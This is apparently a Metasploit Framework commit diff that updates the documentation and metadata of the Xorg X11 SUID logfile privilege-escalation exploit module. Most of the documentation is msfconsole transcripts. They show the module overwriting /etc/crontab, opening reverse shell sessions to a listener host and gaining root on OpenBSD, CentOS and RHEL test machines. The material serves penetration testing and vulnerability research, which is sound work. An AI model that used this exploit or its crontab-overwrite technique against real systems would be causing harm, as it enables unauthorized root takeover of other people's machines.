Land #11764, update tested versions for xor_x11_suid_server module

master
Brent Cook 2019-04-24 05:11:41 -05:00
commit 9793c839f2
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 127 additions and 24 deletions

View File

@ -7,17 +7,20 @@
Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions. Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
Xorg is more restrictive to exploit under CentOS. The user must have console lock and SeLinux may interfere. If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it. Xorg is more restrictive to exploit under CentOS / RHEL. The user must have console lock and SeLinux may interfere. If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.
This module has been tested successfully on: This module has been tested successfully on:
* OpenBSD 6.3 * OpenBSD 6.3
* OpenBSD 6.4 * OpenBSD 6.4
* CentOS 7.4.1708 x86_64
* CentOS 7.5.1084 x86_64 * CentOS 7.5.1084 x86_64
* Red Hat Enterprise Linux 7.5 x86_64
## Verification Steps ## Verification Steps
On CentOS your session must have console lock. To get a console lock you can login locally with a user.
On CentOS/RHEL your session must have console lock. To get a console lock you can login locally with a user.
1. Start `msfconsole` 1. Start `msfconsole`
2. Get a session 2. Get a session
@ -29,12 +32,6 @@
8. You should get a new *root* session 8. You should get a new *root* session
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
## Advanced Options ## Advanced Options
**Xdisplay** **Xdisplay**
@ -43,19 +40,25 @@
**WritableDir** **WritableDir**
A writable directory file system path. (default: `/tmp`) A writable directory file system path (default: `/tmp`)
**ConsoleLock**
**ConsoleLock** Will check for console lock under linux (default: `true`)
Will check for console lock under linux (default: `true`)
## Scenarios ## Scenarios
### OpenBSD
``` ```
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1 msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1 session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2
lhost => 172.30.0.2
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run msf5 exploit(multi/local/xorg_x11_suid_server) > run
[!] SESSION may not be compatible with this module. [!] SESSION may not be compatible with this module.
@ -89,3 +92,98 @@ msf5 exploit(multi/local/xorg_x11_suid_server) > run
id id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
``` ```
### CentOS 7.4.1708 x86_64
```
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.188:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.3 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zk0jobDMxFdBxLBU;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "zk0jobDMxFdBxLBU\n"
[*] Matching...
[*] B is input...
[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
[*] Waiting on cron to run
[+] Returning session after cleaning
[+] Deleted /tmp/.session-Tafw0iW0r8
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
```
### Red Hat Enterprise Linux 7.5 x86_64
```
msf5 > use exploit/multi/local/xorg_x11_suid_server
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
session => 1
msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
verbose => true
msf5 exploit(multi/local/xorg_x11_suid_server) > run
[*] Started reverse double SSL handler on 172.16.191.165:4444
[*] Running additional check for Linux
[+] Console lock for user
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[!] Xorg in process list
[!] Could not get version or Xorg process possibly running, may fail
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Trying /etc/crontab overwrite
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EEdPp66R4es6U3WF;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...
[*] Reading from socket B
[*] B: "EEdPp66R4es6U3WF\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.228:44978) at 2019-04-21 06:29:04 -0400
[+] Returning session after cleaning
[+] Deleted /tmp/.session-aqxyug0fH
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
uname -a
Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.5 (Maipo)
```

View File

@ -5,6 +5,7 @@
class MetasploitModule < Msf::Exploit::Local class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking Rank = GoodRanking
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::FileDropper include Msf::Exploit::FileDropper
include Msf::Post::File include Msf::Post::File
@ -13,21 +14,25 @@ class MetasploitModule < Msf::Exploit::Local
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Xorg X11 Server SUID privilege escalation', 'Name' => 'Xorg X11 Server SUID logfile Privilege Escalation',
'Description' => %q{ 'Description' => %q{
This module attempts to gain root privileges with SUID Xorg X11 server This module attempts to gain root privileges with SUID Xorg X11 server
versions 1.19.0 < 1.20.3. versions 1.19.0 < 1.20.3.
A permission check flaw exists for -modulepath and -logfile options when A permission check flaw exists for -modulepath and -logfile options when
starting Xorg. This allows unprivileged users that can start the server starting Xorg. This allows unprivileged users that can start the server
the ability to elevate privileges and run arbitrary code under root the ability to elevate privileges and run arbitrary code under root
privileges. privileges.
This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and
CentOS default install will require console auth for the users session. CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS
Cron launches the payload so if Selinux is enforcing exploitation and RHEL systems requires console auth for the user's session to start
the Xorg server.
Cron launches the payload, so if SELinux is enforcing, exploitation
may still be possible, but the module will bail. may still be possible, but the module will bail.
Xorg must have SUID permissions and may not start if running.
Xorg must have SUID permissions and may not start if already running.
On exploitation a crontab.old backup file will be created by Xorg. On exploitation a crontab.old backup file will be created by Xorg.
This module will remove the .old file and restore crontab after This module will remove the .old file and restore crontab after
@ -41,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
'Narendra Shinde', # Discovery and exploit 'Narendra Shinde', # Discovery and exploit
'Raptor - 0xdea', # Modified exploit for cron 'Raptor - 0xdea', # Modified exploit for cron
'Aaron Ringo', # Metasploit module 'Aaron Ringo', # Metasploit module
'bcoles' # Metasploit module 'bcoles' # Metasploit module
], ],
'DisclosureDate' => 'Oct 25 2018', 'DisclosureDate' => 'Oct 25 2018',
'References' => 'References' =>
@ -80,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Local
[ [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]), OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]) OptBool.new('ConsoleLock', [ true, 'Will check for console lock on linux systems', true ])
] ]
) )
end end
@ -168,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Local
check_status = check check_status = check
if check_status == CheckCode::Appears if check_status == CheckCode::Appears
print_warning 'Could not get version or Xorg process possibly running, may fail' print_warning 'Could not get version or Xorg process possibly running, may fail'
elsif check_status == CheckCode::Safe elsif check_status == CheckCode::Safe
fail_with Failure::NotVulnerable, 'Target not vulnerable' fail_with Failure::NotVulnerable, 'Target not vulnerable'
end end